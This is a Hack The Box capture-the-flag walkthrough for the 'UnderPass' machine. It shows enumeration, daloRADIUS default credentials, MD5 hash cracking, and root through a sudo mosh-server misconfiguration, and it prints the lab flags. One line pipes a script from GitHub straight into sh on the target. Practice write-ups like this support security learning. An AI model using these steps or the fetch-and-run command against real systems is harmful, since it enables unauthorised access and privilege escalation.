HTB UnderPass Writeup (Walkthrough)
Introduction
This writeup documents the process of compromising the “UnderPass” machine from Hack The Box. The machine features a web application with default credentials, an exploitable daloRADIUS installation, and a privilege escalation path through mosh-server.
INFO
Machine IP = 10.10.11.48 OS = Linux Level = EASY Points = 20
Enumeration
Nmap Scan
The first step was to conduct a port scan using Nmap to identify open services:
1
nmap -sC -sV -oA UnderPass_TCP 10.10.11.48
Results:
1
2
3
4
5
6
7
8
9
10
11
12
13
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-21 14:04 EDT
Nmap scan report for underpass.htb (10.10.11.48)
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_ 256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The scan revealed two open ports:
- Port 22: SSH service (OpenSSH 8.9p1)
- Port 80: HTTP service (Apache 2.4.52)
SNMP Enumeration
SNMP was checked to gather additional system information:
1
snmp-check 10.10.11.48
The SNMP enumeration revealed useful information:
1
2
3
4
5
6
7
8
9
10
11
[+] Try to connect to 10.10.11.48:161 using SNMPv1 and community 'public'
[*] System information:
Host IP address : 10.10.11.48
Hostname : UnDerPass.htb is the only daloradius server in the basin!
Description : Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
Contact : [email protected]
Location : Nevada, U.S.A. but not Vegas
Uptime snmp : 00:20:09.07
Uptime system : 00:19:58.73
System date : 2025-4-21 18:05:56.0
The SNMP information revealed:
- The hostname suggests a daloRADIUS server is running
- The contact email: [email protected]
- System details suggesting it’s an Ubuntu machine
Web Application Enumeration
Based on the SNMP information, I used Gobuster to look for web directories, specifically focusing on the daloRADIUS application:
1
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://underpass.htb/daloradius/
Results showed various directories:
1
2
3
4
5
6
7
8
/library (Status: 301) [Size: 327] [--> http://underpass.htb/daloradius/library/]
/doc (Status: 301) [Size: 323] [--> http://underpass.htb/daloradius/doc/]
/app (Status: 301) [Size: 323] [--> http://underpass.htb/daloradius/app/]
/contrib (Status: 301) [Size: 327] [--> http://underpass.htb/daloradius/contrib/]
/ChangeLog (Status: 200) [Size: 24703]
/setup (Status: 301) [Size: 325] [--> http://underpass.htb/daloradius/setup/]
/LICENSE (Status: 200) [Size: 18011]
/FAQS (Status: 200) [Size: 1428]
Then I focused on the /app directory:
1
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://underpass.htb/daloradius/app
Results:
1
2
3
/common (Status: 301) [Size: 330] [--> http://underpass.htb/daloradius/app/common/]
/users (Status: 301) [Size: 329] [--> http://underpass.htb/daloradius/app/users/]
/operators (Status: 301) [Size: 333] [--> http://underpass.htb/daloradius/app/operators/]
Initial Access
daloRADIUS Login
Through research, I found that daloRADIUS typically uses default credentials:
- Username: administrator
- Password: radius
These credentials could be used at http://underpass.htb/daloradius/login.php.
Password Cracking
During exploration of the daloRADIUS application, I found an MD5 hash:
1
412DD4759978ACFCC81DEAB01B382403
I saved this hash to a file and used John the Ripper to crack it:
1
2
echo "412DD4759978ACFCC81DEAB01B382403" >> hash_pass.txt
john hash_pass.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5
The hash was successfully cracked:
1
underwaterfriends (?)
User Access
Using the credentials obtained (likely username: svcMosh, password: underwaterfriends), I established an SSH connection:
1
ssh [email protected]
After successful login, I was able to read the user flag:
1
2
svcMosh@underpass:~$ cat user.txt
0b07d919fbe687f005d1fdc87bd9350c
Privilege Escalation
Enumeration with LinPEAS
I attempted to download LinPEAS directly on the target machine, but faced network connectivity issues:
1
2
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
curl: (6) Could not resolve host: github.com
So I downloaded LinPEAS to my local machine and then transferred it to the target:
1
2
3
4
5
6
7
# On local machine
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -o linpeas.sh
scp linpeas.sh [email protected]:/tmp/
# On target machine
chmod +x linpeas.sh
./linpeas.sh
Sudo Permissions
I checked available sudo permissions:
1
sudo -l
Results:
1
2
User svcMosh may run the following commands on localhost:
(ALL) NOPASSWD: /usr/bin/mosh-server
This showed that the user svcMosh can run /usr/bin/mosh-server with sudo privileges without a password.
Exploiting mosh-server
After exploring the mosh command options, I found a way to leverage the sudo permission to gain root access:
1
mosh --server="sudo /usr/bin/mosh-server" localhost
This command executes mosh-server with sudo privileges, giving us a root shell:
1
2
root@underpass:~# cat root.txt
4076d358022740f6537c6d9e8d5a5d29
Conclusion
This machine was compromised through:
- Reconnaissance: Using Nmap and SNMP to discover services and information
- Web Application Enumeration: Finding the daloRADIUS installation
- Credential Discovery: Identifying default credentials and cracking a hash
- Privilege Escalation: Exploiting sudo permissions for the mosh-server
The machine demonstrates the risks of:
- Using default credentials
- Exposing SNMP with public community strings
- Insecure sudo configurations
Flags:
- User: 0b07d919fbe687f005d1fdc87bd9350c
- Root: 4076d358022740f6537c6d9e8d5a5d29
Done!
Hi there 👋 Support me!
Life is an echo—what you send out comes back.
